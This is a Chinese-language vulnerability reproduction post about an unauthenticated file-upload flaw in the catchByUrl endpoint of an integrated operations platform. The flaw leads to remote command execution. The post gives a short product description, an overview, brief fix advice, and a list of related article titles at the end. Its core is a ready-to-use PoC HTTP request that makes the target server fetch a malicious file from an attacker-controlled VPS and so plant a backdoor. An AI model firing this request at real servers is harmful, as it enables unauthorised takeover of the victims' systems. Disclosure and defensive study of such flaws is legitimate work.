某科聚网一体化运营平台 catchByUrl 文件上传致RCE漏洞复现

0x01 产品简介

某科聚网一体化运营平台是一种综合性的软件平台,旨在帮助企业实现运营管理的集中化、自动化和协同化。该平台通常提供一系列功能模块和工具,用于支持企业在销售、营销、客户关系管理、供应链管理、人力资源管理等方面的运营活动。

0x02 漏洞概述

某科聚网一体化运营平台 catchByUrl接口存在文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传后门文件,执行任意指令,从而获取服务器权限。

0x03 复现环境

0x04 漏洞复现

PoC

GET /resources/files/ue/catchByUrl?url=http://vpsip/恶意文件 HTTP/1.1 
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
Connection: close

验证

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

相关推荐
北京搜维尔科技有限公司1 小时前
搜维尔科技:【应用】Xsens在荷兰车辆管理局人体工程学评估中的应用
人工智能·安全
云起无垠1 小时前
技术分享 | 大语言模型赋能软件测试:开启智能软件安全新时代
人工智能·安全·语言模型
ac-er88882 小时前
PHP弱类型安全问题
开发语言·安全·php
One_Blanks2 小时前
渗透测试-Linux基础(1)
linux·运维·安全
易云码2 小时前
信息安全建设方案,网络安全等保测评方案,等保技术解决方案,等保总体实施方案(Word原件)
数据库·物联网·安全·web安全·低代码
Qspace丨轻空间3 小时前
气膜场馆:推动体育文化旅游创新发展的关键力量—轻空间
大数据·人工智能·安全·生活·娱乐
Suckerbin5 小时前
Hms?: 1渗透测试
学习·安全·网络安全
Diamond技术流5 小时前
从0开始学习Linux——网络配置
linux·运维·网络·学习·安全·centos
Spring_java_gg5 小时前
如何抵御 Linux 服务器黑客威胁和攻击
linux·服务器·网络·安全·web安全
独行soc6 小时前
#渗透测试#SRC漏洞挖掘#深入挖掘XSS漏洞02之测试流程
web安全·面试·渗透测试·xss·漏洞挖掘·1024程序员节